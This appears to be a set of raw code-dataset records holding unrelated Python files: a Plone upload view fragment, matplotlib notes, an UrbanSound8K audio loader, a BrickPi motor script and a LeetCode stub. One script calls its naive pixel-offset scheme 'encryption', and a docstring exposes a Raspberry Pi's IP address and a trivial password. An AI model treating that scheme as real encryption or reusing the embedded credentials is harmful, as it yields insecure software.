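\n # NOTE (illustrative, added for clarity): jQuery File Upload expects a JSON\n # body of the form {\"files\": [{...}]}; a successful image upload from this\n # view would therefore look roughly like:\n # {\"files\": [{\"url\": \"http://site/plone/foo.png\", \"name\": \"foo.png\",\n # \"type\": \"image/png\", \"size\": 1234,\n # \"thumbnail_url\": \"http://site/plone/foo.png/@@images/image/tile\"}]}\n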
\n\n return json.dumps({\n 'files': [result]\n })\n","sub_path":"wildcard/foldercontents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"339773111","text":"import cv2\nimport numpy as np\nimport random\nimport pickle\nimport sys\n\nq = 829\t\t\t\t\t\t\t# prime number < 1.84467 * 10^10\n\nfilename = sys.argv[1]\n\nimarr = cv2.imread(filename)\t# array generation\n\n\nwupper = 10**9\t\t\t\t\t# upper limit of w\nwlower = 10\t\t\t\t\t\t# lower limit of w\nsh = imarr.shape\n\nimarr = imarr.astype('uint64')\n\nfor i in range(sh[0]):\n\tfor j in range(sh[1]):\n\t\tfor k in range(sh[2]):\n\t\t\tw = random.randint(wlower, wupper)\n\t\t\tt =np.asarray(w*q)\n\t\t\tt = t.astype('uint64')\n\t\t\timarr[i][j][k] += t\n\npickle.dump(imarr, open(\"encrypted.bin\", 'wb'))","sub_path":"prototype/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"95793681","text":"# coding=utf-8\n# gallery: https://matplotlib.org/gallery.html\n\n#**************************************************\n# Anatomy diagram of the plt components: it is drawn entirely with code\n# https://matplotlib.org/examples/showcase/anatomy.html\n#**************************************************\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nplt.style.use('ggplot')\nplt.figure(figsize=(12,12))\n\n#**************************************************\n# Approach 1: MATLAB-style, using the state-based interface\n#**************************************************\nhelp(plt.figure)\n# Start: first figure canvas ----------------------------------------------------------------\nplt.figure(num=1,figsize=(12, 6))\nplt.subplot(211) # first subplot of the first figure\nplt.title('Actual plotting happens below')\nplt.subplot(212) # second subplot of the first figure\nplt.plot([4, 5, 6])\n\n# Start: second figure canvas ----------------------------------------------------------------\nplt.figure(2)\nplt.plot([4, 5, 6]) # creates subplot(111) by default\n\n# Switch back to: first figure canvas ----------------------------------------------------------------\nplt.figure(1) # switch to figure 1; at this point subplot(212) of figure 1 is the active axes\nplt.subplot(211) # make subplot(211) the active axes of figure 1\nx = np.arange(9)\ny = np.sin(x)\nz = np.cos(x)\nplt.plot(x, y, marker=\"*\", linewidth=3, linestyle=\"--\", color=\"orange\") # marker: data-point style, linewidth: line width, linestyle: line style, color: line color\nplt.plot(x, z)\nplt.title(\"matplotlib\")\nplt.xlabel(\"height\")\nplt.ylabel(\"width\")\nplt.legend([\"Y\",\"Z\"], loc=\"upper right\") # set the legend\nplt.grid(True)\n\n\n#**************************************************\n# Approach 2: the object-oriented interface; fig and ax are created separately, mainly to get IDE code completion\n#**************************************************\nfig = plt.figure(num=1,figsize=(8, 8))\nax = fig.add_subplot(2, 1, 1, aspect=1 , facecolor='r' , projection='polar')\n# ax = fig.add_subplot(211, aspect=1 , facecolor='r' , projection='polar') # equivalent to the line above\n\nax.plot(x=None,y=None) # line chart\nax.scatter(x=None,y=None) # scatter plot\nax.bar(x=None,height=None) # bar chart\nax.pie(x=None) # pie chart\nax.hist(x=None,bins=None) # histogram\n\nfig.set_\nax.set_\n\n\n#**************************************************\n# Approach 2.1 (variant): object-oriented interface; fig and axes can be created in one call, but without code completion\n#**************************************************\nfig , axes = plt.subplots(nrows=2,ncols=1,sharex=True,sharey=False) #type:matplotlib.figure.Figure,np.array\nfig.subplots_adjust(left=0.1 ,right=0.95 ,top=0.9 ,bottom=0.1 ,wspace=0.3 ,hspace=0.3)\n
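\n# NOTE (illustrative, added for clarity) -- a minimal self-contained\n# OO-interface example using only standard matplotlib calls, mirroring the\n# two-curve state-based plot above:\n#   fig, ax = plt.subplots(figsize=(8, 4))\n#   x = np.arange(9)\n#   ax.plot(x, np.sin(x), label=\"Y\")\n#   ax.plot(x, np.cos(x), label=\"Z\")\n#   ax.set_xlabel(\"height\"); ax.set_ylabel(\"width\")\n#   ax.legend(loc=\"upper right\"); ax.grid(True)\n#   fig.savefig(\"demo.png\")\n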
axes[0].set_facecolor('skyblue')\n\n\n#**************************************************\n# Chart types\n#**************************************************\nplt.plot(x=None,y=None) # line chart\nplt.scatter(x=None,y=None) # scatter plot\nplt.bar(x=None,height=None) # bar chart\nplt.pie(x=None) # pie chart\nplt.hist(x=None,bins=None) # histogram\n\n\n#**************************************************\n# Chart detail settings\n#**************************************************\nplt.title()\nplt.text()\nplt.xlabel()\nplt.xlim()\nplt.xscale()\nplt.xticks()\nplt.setp()\nplt.legend([\"Y\",\"Z\"], loc=\"upper right\") # set the legend\nplt.grid(True)\n\n\n\n\n\n\n","sub_path":"matplotlib_pyplot.py","file_name":"matplotlib_pyplot.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"529272117","text":"#!/usr/bin/env python3\nfrom USCHeader import *\n\n\nclass USCData :\n def __init__(self, logger):\n \n self.track_duration_in_seconds=4\n self.sound_record_sampling_rate=44100\n self.track_length=self.track_duration_in_seconds*self.sound_record_sampling_rate # 4 seconds record\n self.number_of_classes=10\n self.mini_batch_size=20\n\n self.logger = logger\n self.script_dir=os.path.dirname(os.path.realpath(__file__))\n self.script_name=os.path.basename(self.script_dir)\n self.fold_dirs=['fold1','fold2','fold3','fold4','fold5','fold6','fold7','fold8','fold9','fold10']\n #self.fold_dirs=['fold1','fold10']\n #self.fold_dirs=['fold1']\n self.main_data_dir=self.script_dir+'/../../data/'\n self.raw_data_dir=self.main_data_dir+'/0.raw/UrbanSound8K/audio'\n self.np_data_dir=self.main_data_dir+'/1.np'\n # 44100 sample points per second\n \n \n \n \n self.time_slice_length=2000\n self.time_slice_overlap_length=200\n self.number_of_time_slices=math.ceil(self.track_length/(self.time_slice_length-self.time_slice_overlap_length))\n\n \n \n self.max_number_of_possible_distinct_frequencies_per_second=10\n self.generated_data_count=5000\n self.generated_data_usage_count=0\n self.generated_synthetic_data=None\n self.generate_synthetic_sample()\n self.generated_data_reset_count=0\n self.generated_data_reset_max_number=5000\n \n\n #self.mini_batch_size=40 # very slow learning\n self.fold_data_dictionary=dict()\n self.synthetic_data_file_dictionary=dict()\n self.synthetic_data_file_category_enumeration=dict()\n\n\n\n #self.mini_batch_size=40 # very slow learning\n self.fold_data_dictionary=dict()\n self.youtube_data_file_dictionary=dict()\n self.youtube_data_file_category_enumeration=dict()\n self.current_youtube_data=None\n self.youtube_data_max_category_data_file_count=0\n self.current_data_file_number=0\n self.prepareData()\n #self.findListOfYoutubeDataFiles()\n #self.youtubeDataLoaderThread=threading.Thread(target=self.youtube_data_loader_thread_worker_method, daemon=True)\n #self.youtubeDataLoaderThread.start()\n \n\n def parse_audio_files_and_save_as_np(self):\n sub4SecondSoundFilesCount=0\n for sub_dir in self.fold_dirs:\n self.logger.info(\"Parsing : \"+sub_dir)\n fold=sub_dir\n number_of_wav_files_in_fold=len(glob.glob(os.path.join(self.raw_data_dir, sub_dir, '*.wav')))\n self.logger.info(\"number_of_wav_files_in_fold : \"+str(number_of_wav_files_in_fold))\n sound_data_in_4_second=np.zeros((number_of_wav_files_in_fold,self.track_length+1),dtype=np.float32) # +1 for class number\n counter=0\n for file_path in glob.glob(os.path.join(self.raw_data_dir, sub_dir, '*.wav')):\n self.logger.info(file_path)\n try :\n 
classNumber=file_path.split('/')[-1].split('.')[0].split('-')[1]\n sound_data,sampling_rate=librosa.load(file_path,sr=self.sound_record_sampling_rate)\n sound_data=np.array(sound_data)\n \n #plt.plot(sound_data)\n #plt.show()\n #self.play(sound_data)\n \n sound_data_diff=self.track_length-sound_data.shape[0]\n sound_data_in_4_second[counter,int(sound_data_diff/2):int(sound_data_diff/2+sound_data.shape[0])]=sound_data\n #sound_data_in_4_second[counter,0:sound_data.shape[0]]=sound_data\n sound_data_in_4_second[counter,-1]=classNumber\n\n #plt.plot(sound_data_in_4_second[counter,0:self.track_length])\n #plt.show()\n #self.play(sound_data_in_4_second[counter,0:self.track_length])\n \n counter=counter+1 \n except :\n e = sys.exc_info()[0]\n self.logger.info (\"Exception :\")\n self.logger.info (e) \n np.save(self.np_data_dir+\"/\"+fold+\".npy\", sound_data_in_4_second) \n self.logger.info(\"sub4SecondSoundFilesCount=\"+str(sub4SecondSoundFilesCount)); \n\n\n def prepareData(self):\n self.logger.info(\"Starting to prepare the data ... \")\n if not os.path.exists(self.raw_data_dir) :\n if not os.path.exists(self.main_data_dir+'/../data/0.raw'):\n os.makedirs(self.main_data_dir+'/../data/0.raw') \n if not os.path.exists(self.main_data_dir+\"/0.raw/UrbanSound8K\"):\n if os.path.exists(self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\"):\n self.logger.info(\"Extracting \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\")\n tar = tarfile.open(self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\")\n tar.extractall(self.main_data_dir+'/../data/0.raw')\n tar.close()\n self.logger.info(\"Extracted \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\")\n else : \n self.logger.info(\"download \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz from http://serv.cusp.nyu.edu/files/jsalamon/datasets/content_loader.php?id=2 using firefox browser or chromium and re-run this script\")\n # self.logger.info(\"download \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz from https://serv.cusp.nyu.edu/projects/urbansounddataset/download-urbansound8k.html using firefox browser or chromium and re-run this script\")\n exit(1)\n# http = urllib3.PoolManager()\n# chunk_size=100000\n# r = http.request('GET', 'http://serv.cusp.nyu.edu/files/jsalamon/datasets/content_loader.php?id=2', preload_content=False)\n# with open(self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\", 'wb') as out:\n# while True:\n# data = r.read(chunk_size)\n# if not data:\n# break\n# out.write(data)\n# r.release_conn()\n\n if not os.path.exists(self.np_data_dir) :\n os.makedirs(self.np_data_dir) \n self.parse_audio_files_and_save_as_np()\n \n self.logger.info(\"Data is READY in NPY format. 
\")\n self.load_all_np_data_back_to_memory()\n\n\n def normalize(self,data):\n #normalized_data = data/np.linalg.norm(data) \n normalized_data = data\n if data.shape[0]>0 :\n #print(\"###########################################\")\n #print(np.amin(data))\n #print(np.amax(data))\n minimum=np.amin(data)\n maximum=np.amax(data)\n delta=maximum-minimum\n normalized_data = (data-minimum)/delta\n #print(np.amin(normalized_data))\n #print(np.amax(normalized_data))\n\n return normalized_data\n\n def one_hot_encode_array(self,arrayOfYData):\n # arrayOfYData.shape[0]==batch_size\n # all-zero for unknown class youtube data\n returnMatrix=np.zeros([arrayOfYData.shape[0],self.number_of_classes]);\n for i in range(arrayOfYData.shape[0]):\n classNumber=int(arrayOfYData[i])\n if classNumber<10 :\n returnMatrix[i,classNumber]=1\n# else :\n# let the row be all 0 (M.P.)\n return returnMatrix\n\n def similarity_array(self,arrayOfYData_1,arrayOfYData_2):\n indices=np.where(np.equal(arrayOfYData_1, arrayOfYData_2))[0]\n returnMatrix=np.zeros([arrayOfYData_1.shape[0]]);\n returnMatrix[indices]=1\n return returnMatrix\n\n def is_all_data_labeled(self,arrayOfYData):\n indices=np.where(arrayOfYData>=10)[1]\n if len(indices) > 0 :\n return 0\n return 1\n\n\n def one_hot_encode(self,classNumber):\n one_hot_encoded_class_number = np.zeros(self.number_of_classes)\n one_hot_encoded_class_number[int(classNumber)]=1\n return one_hot_encoded_class_number\n\n\n def findListOfYoutubeDataFiles(self):\n self.logger.info (\"Crawling Youtube Data Files From Directory ../../youtube/downloads/ ...\")\n if not os.path.exists('../../youtube/raw/'):\n self.logger.info(\"../../youtube/raw/ directory does not exist.\")\n self.logger.info(\"Please do the following :\")\n self.logger.info(\" 1. cd ../../youtube/\")\n self.logger.info(\" 2. ./download.sh\")\n self.logger.info(\" 3. ./convertAll.sh\")\n self.logger.info(\" 4. ./splitAll.sh\")\n self.logger.info(\" 5. 
python3 prepareNPYDataFiles.py\")\n exit(1);\n if len(glob.glob('../../youtube/raw/*/*.npy')) == 0:\n self.logger.info(\"../../youtube/raw/*/*.npy data files do not exist , first go to ../../youtube directory and run 'python3 prepareNPYDataFiles.py' \")\n exit(1);\n\n enum=100\n for category in glob.glob('../../youtube/raw/*/'):\n dataFileList=glob.glob(category+'/*.npy')\n if len(dataFileList) > self.youtube_data_max_category_data_file_count :\n self.youtube_data_max_category_data_file_count=len(dataFileList)\n self.youtube_data_file_dictionary[category]=random.sample(dataFileList,len(dataFileList))\n self.youtube_data_file_category_enumeration[category]=enum\n enum+=1\n self.logger.info(\"There are \"+str(enum-100)+\" categories of youtube data\")\n\n\n def getNextYoutubeData(self):\n if self.current_youtube_data is None :\n self.logger.info(\"self.current_youtube_data is None , so first loading youtube data to memory\")\n self.loadNextYoutubeData()\n returnValue=self.current_youtube_data\n self.current_youtube_data=None\n return returnValue\n\n def loadNextYoutubeData(self):\n local_youtube_data=np.empty([0,4*self.sound_record_sampling_rate+1])\n for category in self.youtube_data_file_dictionary :\n dataFileList= self.youtube_data_file_dictionary[category]\n if len(dataFileList) > self.current_data_file_number :\n #self.logger.info(\"loading\"+ category+'/data.'+str(self.current_data_file_number)+'.npy')\n loadedData=np.load(category+'/data.'+str(self.current_data_file_number)+'.npy')\n loadedData=loadedData[:,:4*self.sound_record_sampling_rate]\n newLoadedData=np.zeros((loadedData.shape[0],loadedData.shape[1]+1),dtype=np.float32)\n newLoadedData[:,:-1]=loadedData\n loadedData=newLoadedData\n #SET out of range category of current data\n\n loadedData[:,4*self.sound_record_sampling_rate]=np.full((loadedData.shape[0]),self.youtube_data_file_category_enumeration[category])\n #listOf4SecondRecords=loadedData.tolist()\n #self.logger.info(len(listOf4SecondRecords))\n local_youtube_data=np.vstack((local_youtube_data,loadedData)) ## this appends listOf4SecondRecords to local_youtube_data\n self.current_data_file_number= (self.current_data_file_number+1)%self.youtube_data_max_category_data_file_count \n np.random.shuffle(local_youtube_data)\n self.current_youtube_data=local_youtube_data\n #self.logger.info(self.current_youtube_data.shape)\n\n def youtube_data_loader_thread_worker_method(self):\n self.logger.info(\" youtube_data_loader_thread_worker_method is called \")\n while(True):\n if self.current_youtube_data is None :\n self.loadNextYoutubeData()\n else :\n time.sleep(1)\n\n def load_all_np_data_back_to_memory(self):\n self.logger.info (\"load_all_np_data_back_to_memory function started ...\")\n for fold in self.fold_dirs:\n self.logger.info (\"loading from \"+self.np_data_dir+\"/\"+fold+\".npy ...\")\n self.fold_data_dictionary[fold]=np.load(self.np_data_dir+\"/\"+fold+\".npy\")\n self.logger.info (\"load_all_np_data_back_to_memory function finished ...\")\n\n \n\n def get_fold_data(self,fold):\n return np.random.permutation(self.fold_data_dictionary[fold])\n\n def augment_speedx(self,sound_array, factor):\n \"\"\" Multiplies the sound's speed by some `factor` \"\"\"\n temp=np.copy(sound_array)\n sound_array[:]=0\n indices = np.round( np.arange(0, len(sound_array), factor) )\n indices = indices[indices < len(sound_array)].astype(int)\n result_calculated= temp[ indices.astype(int) ]\n if len(sound_array) > len(result_calculated) :\n sound_array[:len(result_calculated)]=result_calculated\n 
else :\n sound_array[:]=result_calculated[:len(sound_array)]\n\n\n def augment_inverse(self,sound_array):\n sound_array[:]=-sound_array\n\n def augment_volume(self,sound_array,factor):\n sound_array[:]=sound_array*factor\n \n def augment_echo(self,sound_array,echo_time):\n echo_start_index=int(echo_time*self.sound_record_sampling_rate)\n sound_array[echo_start_index:]=sound_array[echo_start_index:]+sound_array[:int(sound_array.shape[0]-echo_start_index)]/2\n\n \n def augment_translate(self,snd_array,TRANSLATION_FACTOR):\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n \"\"\" Translates the sound wave by n indices, filling the first n elements of the array with zeros \"\"\"\n snd_array[TRANSLATION_FACTOR:]=snd_array[:snd_array.shape[0]-TRANSLATION_FACTOR]\n snd_array[:TRANSLATION_FACTOR]=0\n\n\n def augment_set_zero(self,snd_array,ZERO_INDEX):\n \"\"\" Zeroes out the last n elements of the sound wave \"\"\"\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n snd_array[-ZERO_INDEX:]=0\n\n\n def augment_occlude(self,snd_array,OCCLUDE_START_INDEX,OCCLUDE_WIDTH):\n \"\"\" Zeroes out a window of the sound wave, starting at the given index \"\"\"\n snd_array[OCCLUDE_START_INDEX:OCCLUDE_START_INDEX+OCCLUDE_WIDTH]=0\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n\n\n def overlapping_slice(self,x_data,hanning=False):\n sliced_and_overlapped_data=np.zeros([self.mini_batch_size,self.number_of_time_slices,self.time_slice_length],dtype=np.float32)\n step=self.time_slice_length-self.time_slice_overlap_length\n hanning_window=np.hanning(self.time_slice_length)\n for i in range(self.mini_batch_size):\n for j in range(self.number_of_time_slices):\n step_index=j*step\n if step_index+self.time_slice_length>x_data.shape[1]:\n overlapped_time_slice=np.zeros(self.time_slice_length,dtype=np.float32)\n overlapped_time_slice[0:int(x_data.shape[1]-step_index)]=x_data[i,step_index:x_data.shape[1]]\n else :\n overlapped_time_slice=x_data[i,step_index:step_index+self.time_slice_length]\n sliced_and_overlapped_data[i,j]=overlapped_time_slice\n if hanning :\n sliced_and_overlapped_data[i,j]*=hanning_window\n \n #self.logger.info(sliced_and_overlapped_data.shape)\n #self.logger.info(sliced_and_overlapped_data[0][100][step])\n #self.logger.info(sliced_and_overlapped_data[0][101][0])\n return sliced_and_overlapped_data\n #x_input_list = tf.unstack(self.x_input_reshaped, self.number_of_time_slices, 1)\n\n def fft(self,x_data):\n #deneme_data=x_data[15][25]\n #self.logger.info(\"deneme_datae[18]=\"+str(deneme_data[18]))\n #fft_deneme_data=np.abs(np.fft.fft(deneme_data))\n #self.logger.info(\"fft_deneme_data[18]=\"+str(fft_deneme_data[18]))\n x_data = np.abs(np.fft.fft(x_data))\n #self.logger.info(\"x_data[15][25][18]=\"+str(x_data[15][25][18]))\n return x_data\n\n def convert_to_list_of_word2vec_window_sized_data(self,x_data):\n #print(x_data.shape)\n result=[]\n # Mehmet Pekmezci: make combinations by rotating rows within each word2vec window\n
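 # NOTE (illustrative, added for clarity): worked example of the rotation\n # below -- with word2vec_window_size=2, the first pass swaps rows 0 and 1\n # and the second pass swaps them back, so both orderings (A, B) and (B, A)\n # of each window end up appended to result.\n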
 for i in range(self.word2vec_window_size):\n row_i=np.copy(x_data[:,i,:]) # copy (not a view), otherwise the swap below would overwrite both rows\n x_data[:,i,:]=x_data[:,int((i+1)%self.word2vec_window_size),:]\n x_data[:,int((i+1)%self.word2vec_window_size),:]=row_i\n x_data_window=np.reshape(x_data,(self.mini_batch_size,int(self.number_of_time_slices/self.word2vec_window_size),self.word2vec_window_size,self.time_slice_length))\n ## switch axes of batch_size and parallel_lstms, then convert it to list according to first axis. --> this will give us list of matrices of shape (mini_batch_size,lstm_time_steps,time_slice_length)\n x_list=np.swapaxes(x_data_window,0,1).tolist()\n result=result+x_list\n return np.random.permutation(result)\n\n def augment(self,x_data):\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n choice1=int(np.random.rand()*20)\n choice2=int(np.random.rand()*20)\n # roughly a 30% chance (choice1 < 6) of not augmenting; in that case the data is left unchanged\n if choice1>=6 :\n\n SPEED_FACTOR=0.8+choice1/20*0.5\n VOLUME_FACTOR=0.8+choice2/20*0.5 # between 0.8 and 1.4 times \n TRANSLATION_FACTOR=int(1000*choice1)+1\n ZERO_INDEX=int(choice2*1500)+1\n OCCLUDE_START_INDEX=int(choice1*4410)+1000\n OCCLUDE_WIDTH=int(1000*choice2)+1\n ECHO_TIME=choice1/20*3 ## echo delay between 0 and 3 seconds\n \n if choice2%2 == 0 :\n self.augment_inverse(x_data)\n if choice1%2 == 1 :\n self.augment_echo(x_data,ECHO_TIME)\n\n #self.augment_speedx(x_data,SPEED_FACTOR)\n self.augment_translate(x_data,TRANSLATION_FACTOR)\n self.augment_set_zero(x_data,ZERO_INDEX)\n self.augment_occlude(x_data,OCCLUDE_START_INDEX,OCCLUDE_WIDTH)\n self.augment_volume(x_data,VOLUME_FACTOR) \n\n \n\n \n \n \n def augment_random(self,x_data):\n\n #self.play(self.augment_echo(x_data[5],2.5))\n #plt.plot(x_data[9])\n #plt.show()\n #self.play(x_data[2])\n #sys.exit(0)\n \n if self.generated_data_reset_count > self.generated_data_reset_max_number :\n self.generated_data_reset_count=0\n self.generated_data_usage_count=0\n self.generated_synthetic_data=self.generate_synthetic_sample()\n \n if (self.generated_data_usage_count+1)*self.mini_batch_size > self.generated_data_count :\n self.generated_data_reset_count=self.generated_data_reset_count+1\n self.generated_data_usage_count=0\n np.random.shuffle(self.generated_synthetic_data)\n \n augmented_data= np.copy(x_data)\n for i in range(x_data.shape[0]) :\n self.augment(augmented_data[i]) \n \n #print( \"augmented_data[7,7000]\")\n #print( augmented_data[7,7000])\n #print( x_data[7,7000])\n \n \n augmented_data=augmented_data+self.generated_synthetic_data[self.generated_data_usage_count*self.mini_batch_size:(self.generated_data_usage_count+1)*self.mini_batch_size,:]\n self.generated_data_usage_count=self.generated_data_usage_count+1\n \n \n return augmented_data\n \n def generate_synthetic_sample(self):\n \n\n if self.generated_synthetic_data is None :\n self.generated_synthetic_data=np.zeros([self.generated_data_count,self.track_length],np.float32)\n else :\n self.generated_synthetic_data.fill(0)\n# expected_cochlear_output_data=np.zeros([self.mini_batch_size,self.track_length/(self.max_number_of_possible_distinct_frequencies_per_second*self.track_duration_in_seconds),self.max_number_of_possible_distinct_frequencies_per_second*self.track_duration_in_seconds],np.float32)\n\n thread_list=[]\n for generated_data_no in range(self.generated_data_count):\n if generated_data_no % 500 == 0 :\n self.logger.info (\"Generating Data : \"+str(generated_data_no+500)+\"/\"+str(self.generated_data_count))\n for t in 
thread_list:\n t.join() \n thread_list=[]\n t=threading.Thread(target=self.generate_single_synthetic_sample, args=(generated_data_no,))\n t.start()\n thread_list.append(t)\n \n for t in thread_list:\n t.join() \n# expected_cochlear_output_data[batch_no,\n# return generated_synthetic_data, expected_cochlear_output_data\n\n #self.play(self.augment_echo(x_data[5],2.5))\n #plt.plot(self.generated_synthetic_data[9])\n #plt.show()\n #self.play(self.generated_synthetic_data[2])\n #sys.exit(0)\n \n self.generated_synthetic_data=self.normalize(self.generated_synthetic_data)\n \n\n \n return self.generated_synthetic_data\n \n \n def generate_single_synthetic_sample(self,generated_data_no):\n \n for time_period in range(self.track_duration_in_seconds-1):\n \n for frequency_no in range(self.max_number_of_possible_distinct_frequencies_per_second):\n randomValueFreq=np.random.gamma(2,2)\n randomValue=np.random.rand()\n #randomValueDuration=randomValue*self.track_duration_in_seconds\n randomValueDuration=randomValue\n frequency=randomValue*self.sound_record_sampling_rate+20 # this generates 10-11025 float number, from uniform dist. ( +20 = we can hear at minimum 20 hz ) \n #T=(1/frequency)*self.sound_record_sampling_rate# this generates 2-1102 float number, from uniform dist.\n volume=randomValue*10\n sine_cosine_choice=int(randomValue*2)\n #frequency_data=2*np.pi*np.arange(T)*frequency/self.sound_record_sampling_rate\n frequency_data=2*np.pi*np.arange(self.sound_record_sampling_rate*randomValueDuration+500)*frequency/self.sound_record_sampling_rate\n if sine_cosine_choice == 0 :\n wave_data = (np.sin(frequency_data)).astype(np.float32)\n else :\n wave_data = (np.cos(frequency_data)).astype(np.float32)\n wave_data=volume*wave_data\n \n start_point=int(randomValue*(self.sound_record_sampling_rate/4))+time_period*self.sound_record_sampling_rate\n \n if start_point+wave_data.shape[0] > self.track_duration_in_seconds*self.sound_record_sampling_rate :\n wave_data=wave_data[:self.track_duration_in_seconds*self.sound_record_sampling_rate-start_point]\n \n self.generated_synthetic_data[generated_data_no,start_point:start_point+wave_data.shape[0]]+=wave_data\n #self.play(self.generated_synthetic_data[generated_data_no])\n\n \n \n def play(self,sound_data):\n SOUND_RECORD_SAMPLING_RATE=self.sound_record_sampling_rate\n self.logger.info(\"sound_data.shape=\"+str(sound_data.shape))\n self.logger.info(\"SOUND_RECORD_SAMPLING_RATE=\"+str(SOUND_RECORD_SAMPLING_RATE))\n p = pyaudio.PyAudio()\n\n stream = p.open(format=pyaudio.paFloat32, channels=1, rate=SOUND_RECORD_SAMPLING_RATE, output=True)\n stream.write(sound_data[:44100],SOUND_RECORD_SAMPLING_RATE)\n stream.write(sound_data[44100:88200],SOUND_RECORD_SAMPLING_RATE)\n stream.write(sound_data[88200:132300],SOUND_RECORD_SAMPLING_RATE)\n stream.write(sound_data[122300:176400],SOUND_RECORD_SAMPLING_RATE)\n stream.stop_stream()\n stream.close()\n p.terminate()\n self.logger.info(\"Finished To Play Sound\")\n #input(\"Press Enter to continue...\")\n\n'''\n def generate_single_synthetic_sample(self,single_data):\n generated_data=single_data.copy()\n randomValue=np.random.rand()\n number_of_frequencies=int(randomValue*20)\n #print(\"generated_data[0:TIME_SLICE]=\"+str(generated_data[0:TIME_SLICE]))\n #print(\"number_of_frequencies:\"+str(number_of_frequencies))\n for i in range(number_of_frequencies):\n randomValue=np.random.rand()\n frequency=randomValue*10000 # this generates 0-10000 float number, from uniform dist.\n # frequencies between 10000-20000 is not heard well . 
so we ignore them. Also sampling rate 22050 only allows to detect TIME_SLICE frequency.\n duration=randomValue*4 # this generates 0-4 float number, from uniform dist.\n volume=randomValue*5\n #volume=5\n sine_cosine_choice=int(randomValue*2)\n frequency_data=2*np.pi*np.arange(88200)*frequency/22050\n if sine_cosine_choice == 0 :\n wave_data = (np.sin(frequency_data)).astype(np.float32)\n else :\n wave_data = (np.cos(frequency_data)).astype(np.float32)\n current_frequency_data=volume*wave_data\n start_point=int(randomValue*2000)\n #start_point=0\n #if start_point <= self.time_slice_length :\n # print(\"frequency-\"+str(i)+\":\"+str(frequency)+\" start_point:\"+str(start_point))\n generated_data[start_point:start_point+current_frequency_data.shape[0]]+=current_frequency_data[0:int(current_frequency_data.shape[0]-start_point)]\n #print(\"generated_data[0:TIME_SLICE]=\"+str(generated_data[0:TIME_SLICE]))\n return generated_data\n\n def augment_random(self,x_data):\n augmented_data=np.zeros([x_data.shape[0],x_data.shape[1]],np.float32)\n for i in range(x_data.shape[0]) :\n augmented_data[i]=self.generate_single_synthetic_sample(x_data[i])\n return augmented_data\n''' \n","sub_path":"src/8.1.0-MFCC-Over-CNN/USCData.py","file_name":"USCData.py","file_ext":"py","file_size_in_byte":23838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279183693","text":"#!/usr/bin/env python\n\"\"\"The program for the 'Gipfel-Ei'-project (WI-19/20).\n\nRaspberryPi:\n - IP: 141.82.7.65\n - Name: pi\n - Password: 000\n\nThe program controls the two motors. \n\"\"\"\n\nfrom brickpi3 import BrickPi3\nimport time\n\n__author__ = 'Andreas Venturini'\n__license__ = 'MIT'\n__version__ = '1.0'\n__email__ = 'Andreas.Venturini@HS-Augsburg.DE'\n__status__ = 'Done'\n\n\nBP = BrickPi3()\na = BrickPi3().PORT_A\nb = BrickPi3().PORT_B\n\n\ndef close_gripper():\n \"\"\"Closes the gripper.\"\"\"\n BP.set_motor_position_relative(a, -45)\n time.sleep(2)\n\n\ndef move_up():\n \"\"\" Moves the gripper to the rope drum.\"\"\"\n BP.reset_motor_encoder(b)\n BP.set_motor_limits(b, power=80)\n\n BP.set_motor_position_kd(b, kd=70)\n BP.set_motor_position_kp(b, kp=70)\n BP.set_motor_position(b, 6710)\n time.sleep(17)\n\n\ndef move_down():\n \"\"\"Moves the crab back and then down.\"\"\"\n BP.reset_motor_encoder(b)\n BP.set_motor_limits(b, power=15)\n BP.set_motor_position(b, -200)\n time.sleep(2)\n\n\ndef open_gripper():\n \"\"\"Opens the gripper.\"\"\"\n BP.set_motor_power(a, 30)\n time.sleep(1)\n\n\ndef open_move_up():\n \"\"\"Moves the open gripper up.\"\"\"\n BP.reset_motor_encoder(b)\n BP.set_motor_limits(b, power=100)\n BP.set_motor_position(b, 200)\n time.sleep(2)\n\n\ndef main():\n try:\n start = time.time()\n close_gripper()\n move_up()\n move_down()\n open_gripper()\n open_move_up()\n print(\"Time: \", time.time() - start)\n\n except KeyboardInterrupt:\n print('The program was stopped manually!')\n\n finally:\n BP.reset_all()\n print('Program finished!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"509975770","text":"# https://leetcode-cn.com/problems/sliding-window-maximum/\n\n# Brute force: O(kn)\n# Heap: O(n log k) time, O(k) space\n# Monotonic queue: O(n) time, O(k) space\n\nclass Solution:\n # def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n # '''\n # Brute force, O(kN) -- times out (TLE)\n # '''\n # res = []\n # for i in range(len(nums)-k+1):\n # res.append(max(nums[i:i+k]))\n # return res\n
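 # NOTE (illustrative, added for clarity) -- worked example for the deque\n # version below: nums = [1,3,-1,-3,5,3,6,7], k = 3 gives [3,3,5,5,6,7].\n # The deque holds (index, value) pairs in decreasing value order, so its\n # front is always the maximum of the current window.\n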
